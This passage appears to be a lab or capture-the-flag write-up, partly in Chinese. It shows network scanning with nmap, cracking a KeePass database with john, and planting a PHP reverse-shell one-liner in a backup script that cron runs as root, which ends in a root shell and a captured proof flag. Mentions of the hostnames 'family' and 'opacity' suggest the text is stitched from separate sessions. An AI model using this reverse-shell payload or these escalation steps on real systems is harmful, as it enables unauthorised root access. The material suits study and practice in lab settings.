3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.863 seconds (137.41 hosts/sec). 3 responded
┌──(kali㉿kali)-[~] └─$ ip=192.168.56.106
┌──(kali㉿kali)-[~] └─$ sudo nmap -sS -sV -A -p- $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 02:33 EST Nmap scan report for family (192.168.56.106) Host is up (0.0012s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 0f:ee:29:10:d9:8e:8c:53:e6:4d:e3:67:0c:6e:be:e3 (RSA) | 256 95:42:cd:fc:71:27:99:39:2d:00:49:ad:1b:e4:cf:0e (ECDSA) |_ 256 ed:fe:9c:94:ca:9c:08:6f:f2:5c:a6:cf:4d:3c:8e:5b (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.41 (Ubuntu) | http-title: Login |_Requested resource was login.php 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 MAC Address: 08:00:27:35:F1:10 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 1.25 ms family (192.168.56.106)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds
❯ ls dataset.kdbx rev.php:Zone.Identifier vmessage.py ❯ keepass2john dataset.kdbx >kdbx_hash ❯ john kdbx_hash Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64]) Cost 1 (iteration count) is 100000 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes Will run 4 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance. Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst 741852963 (dataset) 1g 0:00:00:18 DONE 2/3 (2024-11-26 16:42) 0.05534g/s 182.1p/s 182.1c/s 182.1C/s rosita..loveu Use the "--show" option to display all of the cracked passwords reliably Session completed.
sysadmin@opacity:~/scripts/lib$ vim backup.inc.php ------------------------------------------------- <?php $sock=fsockopen("192.168.56.102",4444);exec("sh <&3 >&3 2>&3"); ?>
将php反弹的shell写入,等待系统自动执行crontab,五分钟后shell就弹回来了
1 2 3 4 5 6 7 8 9 10 11
┌──(kali㉿kali)-[/var/www/html] └─$ nc -lvp 4444 listening on [any] 4444 ... id connect to [192.168.56.102] from family [192.168.56.106] 37876 uid=0(root) gid=0(root) groups=0(root) ls proof.txt snap cat proof.txt ac0d56f93202dd57dcb2498c739fd20e